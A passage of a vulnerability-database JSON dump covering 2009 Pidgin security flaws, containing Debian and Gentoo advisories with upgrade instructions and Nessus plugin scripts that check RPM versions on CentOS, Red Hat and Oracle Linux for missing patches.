debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkoXBLsACgkQXm3vHE4uylqYhwCgpviMfpfRRdBhDQAq2FfRPxam\r\nEk4An0udvE+xSS9Lgk4pYBbBx0BhNUEp\r\n=Ou7B\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-05-25T00:00:00", "title": "[SECURITY] [DSA 1805-1] New pidgin packages fix several vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:30", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "modified": "2009-05-25T00:00:00", "id": "SECURITYVULNS:DOC:21869", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21869", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "references": [], "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200905-07\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Pidgin: Multiple vulnerabilities\r\n Date: May 25, 2009\r\n Bugs: #270811\r\n ID: 200905-07\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities in Pidgin might allow for the remote execution\r\nof arbitrary code or a Denial of Service.\r\n\r\nBackground\r\n==========\r\n\r\nPidgin (formerly Gaim) is an instant messaging client for a variety of\r\ninstant messaging protocols.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-im/pidgin < 2.5.6 >= 2.5.6\r\n\r\nDescription\r\n===========\r\n\r\nMultiple vulnerabilities have been discovered in Pidgin:\r\n\r\n* Veracode reported a boundary error in the "XMPP SOCKS5 bytestream\r\n server" when initiating an outgoing file transfer (CVE-2009-1373).\r\n\r\n* Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol\r\n handler (CVE-2009-1374).\r\n\r\n* A memory corruption flaw in "PurpleCircBuffer" was disclosed by\r\n Josef Andrysek (CVE-2009-1375).\r\n\r\n* The previous fix for CVE-2008-2927 contains a cast from uint64 to\r\n size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA\r\n 200901-13).\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could send specially crafted messages or files using\r\nthe MSN, XMPP or QQ protocols, possibly resulting in the execution of\r\narbitrary code with the privileges of the user running the application,\r\nor a Denial of Service. NOTE: Successful exploitation might require the\r\nvictim's interaction.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Pidgin users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-im/pidgin-2.5.6"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2009-1373\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\r\n [ 2 ] CVE-2009-1374\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\r\n [ 3 ] CVE-2009-1375\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\r\n [ 4 ] CVE-2009-1376\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\r\n [ 5 ] GLSA 200901-13\r\n http://www.gentoo.org/security/en/glsa/glsa-200901-13.xml\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200905-07.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2009 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "reporter": "Securityvulns", "published": "2009-05-26T00:00:00", "title": "[ GLSA 200905-07 ] Pidgin: Multiple vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:30", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-26T00:00:00", "id": "SECURITYVULNS:DOC:21887", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21887", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:35:43", "references": ["http://www.nessus.org/u?2bad417f", "http://www.nessus.org/u?6954565b", "http://www.nessus.org/u?d072f5c9", "http://www.nessus.org/u?f49405f9"], "pluginID": "40625", "description": "Updated pidgin packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's MSN protocol handler. If a user received a malicious MSN message, it was possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve this issue. Pidgin must be restarted for this update to take effect.", "edition": 6, "reporter": "Tenable", "published": "2009-08-20T00:00:00", "title": "CentOS 3 / 5 : pidgin (CESA-2009:1218)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40625", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1218 and \n# CentOS Errata and Security Advisory 2009:1218 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40625);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"CentOS 3 / 5 : pidgin (CESA-2009:1218)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-August/016099.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6954565b\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-August/016100.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2bad417f\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-August/016101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f49405f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-August/016102.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d072f5c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:49:51", "references": ["https://www.redhat.com/security/data/cve/CVE-2009-2694.html", "http://rhn.redhat.com/errata/RHSA-2009-1218.html"], "pluginID": "40639", "description": "Updated pidgin packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's MSN protocol handler. If a user received a malicious MSN message, it was possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve this issue. Pidgin must be restarted for this update to take effect.", "edition": 6, "reporter": "Tenable", "published": "2009-08-20T00:00:00", "title": "RHEL 3 / 4 / 5 : pidgin (RHSA-2009:1218)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2018-07-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:pidgin-perl", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:libpurple", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:libpurple-perl", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:pidgin-devel", "p-cpe:/a:redhat:enterprise_linux:pidgin", "p-cpe:/a:redhat:enterprise_linux:finch-devel", "p-cpe:/a:redhat:enterprise_linux:libpurple-devel", "p-cpe:/a:redhat:enterprise_linux:finch", "p-cpe:/a:redhat:enterprise_linux:libpurple-tcl"], "id": "REDHAT-RHSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40639", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1218. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40639);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : pidgin (RHSA-2009:1218)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-2694.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2009-1218.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1218\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:18", "references": ["https://oss.oracle.com/pipermail/el-errata/2009-August/001125.html", "https://oss.oracle.com/pipermail/el-errata/2009-August/001127.html"], "pluginID": "67912", "description": "From Red Hat Security Advisory 2009:1218 :\n\nUpdated pidgin packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's MSN protocol handler. If a user received a malicious MSN message, it was possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve this issue. Pidgin must be restarted for this update to take effect.", "edition": 6, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : pidgin (ELSA-2009-1218)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:pidgin", "p-cpe:/a:oracle:linux:libpurple-devel", "p-cpe:/a:oracle:linux:finch", "p-cpe:/a:oracle:linux:pidgin-perl", "p-cpe:/a:oracle:linux:libpurple", "p-cpe:/a:oracle:linux:libpurple-tcl", "cpe:/o:oracle:linux:3", 